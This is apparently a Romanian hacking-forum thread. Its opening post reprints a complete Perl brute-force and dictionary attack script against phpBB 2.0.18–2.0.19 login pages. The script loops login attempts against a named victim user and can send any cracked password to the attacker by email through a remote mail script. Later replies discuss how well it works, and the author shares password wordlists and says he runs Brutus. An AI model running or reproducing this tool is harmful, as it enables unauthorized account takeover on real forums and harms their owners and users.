Jump to content
Screech

phpBB 2.0.19 BruteForce

By Screech, in Cosul de gunoi

Recommended Posts

Screech Newbie

Screech

Posted
Posted

Downoad tut: http://rapidshare.de/files/25014477/phpbb_...eforce.rar.html

Exploit:

#!/usr/bin/perl

####################################################################################################################

# Title: PhpBB <= 2.0.18 Remote Bruteforce/Dictionary Attack Tool

# Type: Bruteforce / Dictionary attack

# New demo: http://rapidshare.de/files/13694254/phpbbbtr.avi.html (1.06 mb)

# Php Email Script data: <? mail($destinataire, $objet, $contenu, "From: $expediteurrnReply-To: $expediteur"); ?>

# Note: Host the php script and replace the line 34 [] Php script for the email option because win32 don't support Mail::Mailer

# Changelog: Bruteforce option | Starting length | Email option | More fast | Die error disabled |

# Credits: Fully coded by DarkFig

# Greetz: Romano [] Pgeo [] Fred [] CrackJerem [] Volcom [] Ddxs [] The truth [] And all man who like me =)

####################################################################################################################

use IO::Socket;

use LWP::Simple;

#_Utilisation_

if(@ARGV < 6){

print q(

+---------------------------------------------------------------------------------------------------+

| PhpBB <= 2.0.18 Remote Bruteforce/Dictionary Attack Tool [~_~] by DarkFig |

+---------------------------------------------------------------------------------------------------+

| Usage: phpbbbtr.pl <host> <path> <port> <attack> <char> <length> <victim> <log> <email> |

+---------------------------------------------------------------------------------------------------+

| <host> | The host where the php flaw is installed | [Ex: victim.com] |

| <path> | Path of the php flaw | [Ex: /vuln/] |

| <port> | Port of the host | [Ex: 80] |

| <attack> | Bruteforce[-btr] or Dictionary[-dict] | [Ex: -dict] |

| <char> | Bruteforce[upperalpha, loweralpha, numeric] or Dictionary file | [Ex: dico.txt] |

| <length> | For the bruteforce option, define a starting length | [Ex: 7] |

| <victim> | The victim's username | [Ex: L4m3r] |

| <log> | [Optional] File where you want to save the password | [Ex: results.txt] |

| <email> | [Optional] Email where the password will be sent | [Ex: haxor@gmail.com] |

+---------------------------------------------------------------------------------------------------+

);exit;}

#_Configuration_

$mailsite = "http://yoursite.com/mailme.php"; #Replace this value by the Url of the Php email script

$shipper = "xploitdarkfigbot%40gmail.com"; #Default shipper email, xploidarkfigbot@gmail.com really exist => It work ;)

$host = $ARGV[0];

$path = $ARGV[1];

$port = $ARGV[2];

$attack = $ARGV[3];

$content = $ARGV[4];

if($attack eq "-btr"){$length = $ARGV[5];$username = $ARGV[6];$results = $ARGV[7];if(!$ARGV[9]){$mailoption = 0;} else {$mailoption = 1;$email = $ARGV[8];}}

else {$username = $ARGV[5];$results = $ARGV[6];if(!$ARGV[7]){$mailoption = 0;} else {$mailoption = 1;$email = $ARGV[7];}}

$nligne = "-1";

$postit = "$path"."login.php";

$full = "http://"."$host"."$path";&hello;

#_Hello_

sub hello() {

if($attack eq "-dict"){open dictionary, "<$content" || print " [-]Can't open the file.";chomp(@dico = <dictionary>);}

print "n

+--------------------------------------------------------+

PhpBB <= 2.0.18 Remote Bruteforce/Dictionary Attack Tool

+--------------------------------------------------------+

[+] Attack: ";if($attack eq "-btr"){print "Bruteforce";}if($attack eq "-dict"){print "Dictionary";};print"

[+] Target: $full

[+] Port: $port

[+] Username: $username

+--------------------------------------------------------+";

if($content eq "upperalpha"){$nligne = "A";}

if($content eq "loweralpha"){$nligne = "a";}

if($content eq "numeric"){$nligne = "0";}

if($attack eq "-dict"){&dictio;}if($attack eq "-btr"){&generate;}}

#_Bruteforce_

sub generate() {

$nligne x= $length;

$passwordz = $nligne;

print "n [~]Trying the password: $passwordz";

&phpbb;}

sub btrfr() {

$nligne++;

$passwordz = $nligne;

print "n [~]Trying the password: $passwordz";

&phpbb;}

#_Dictionary_

sub dictio() {

$nligne++;

$passwordz = $dico[$nligne];

if($passwordz eq ""){&successfailed;}

print "n [~]Trying the password: $passwordz";

&phpbb;}

#_Socket_

sub phpbb(){

while ($OK ne 1){

$data = "username="."$username"."&password="."$passwordz"."&redirect=&login=Connexion";

$length = length $data;

my $send = IO::Socket::INET->new(Proto => "tcp",PeerAddr => "$host", PeerPort => "$port") || print "n [-]Can't connect to the host.";

print $send "POST $postit HTTP/1.1

Host: $host

Content-Type: application/x-www-form-urlencoded

Content-Length: $length

$data";

read $send, $answer, 15;

close($send);

if($answer =~ /HTTP/(.*?) 302/){$OK = 1;}

&decision;}}

#_Decision_

sub decision(){if($OK ne 1){if($attack eq "-dict"){&dictio;}if($attack eq "-btr"){&btrfr;}} else {&successfailed;}}

#_Success/Failed_

sub successfailed(){

if($OK eq 1){print "n [+]User: $usernamen [+]Password: $passwordz";}

if($OK eq 0){print "n [-]User: $usernamen [-]Password: Not found";}

open FILE, ">$results" || print "n [-]Can't write the file.";

print FILE "

+--------------------------------------------------------+

PhpBB <= 2.0.18 Remote Bruteforce/Dictionary Attack Tool

+--------------------------------------------------------+

[+] Target: $full

[+] Port: $port

[+] Username: $username

[+] Password: ";

if($OK eq 1){print FILE "$passwordz";}

if($OK eq 0){print FILE "Not found...";$passwordz = "Not found";}

print FILE "n+--------------------------------------------------------+n";

close FILE; close dictionary;

#_EmailOption_

if($mailoption eq 1){

$fullmailurl = "$mailsite"."?expediteur="."$shipper"."&destinataire="."$email"."&objet="."[Xploit]Results for $host"."&contenu="."Target: $full"."%0D%0A"."Port: $port"."%0D%0A"."Username: $username"."%0D%0A"."Password: $passwordz";

$mailpg = get($fullmailurl) || print "n [-]Can't connect to the email script hoster.n+--------------------------------------------------------+nn" and exit;

print "n [+]Email sent, check your mail !n+--------------------------------------------------------+nn";} else {print "n+--------------------------------------------------------+n";}exit;}

# milw0rm.com [2006-02-20][/list:u]

E posibil sa mearga si pe alte versiuni, acesta e ptr. 18, dar vad ca merge si pe 19, si doar pe asta am incercat eu

Thunder Newbie

Thunder

Posted
Posted

Da .. l-am avut mai demult si eu dar nu mia prea mers . Trebuie sa ai o lista foarte mare si buna de parole ca sa gasesasca . Acest brute-force face combinatii de usere parole .

Screech Newbie

Screech

Posted
  • Author
Posted

<div class='quotetop'>QUOTE("Thunder")</div>

Da .. l-am avut mai demult si eu dar nu mia prea mers . Trebuie sa ai o lista foarte mare si buna de parole ca sa gasesasca . Acest brute-force face combinatii de usere  parole .

La mine da roade. Poti incerca listele pe care le folosesc si eu daca doresti, le pun acum si vi le dau

http://rapidshare.de/files/25015632/dictio...xavier.rar.html

eu si acum am brutus deschis si folosesc tot listele astea de parole

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...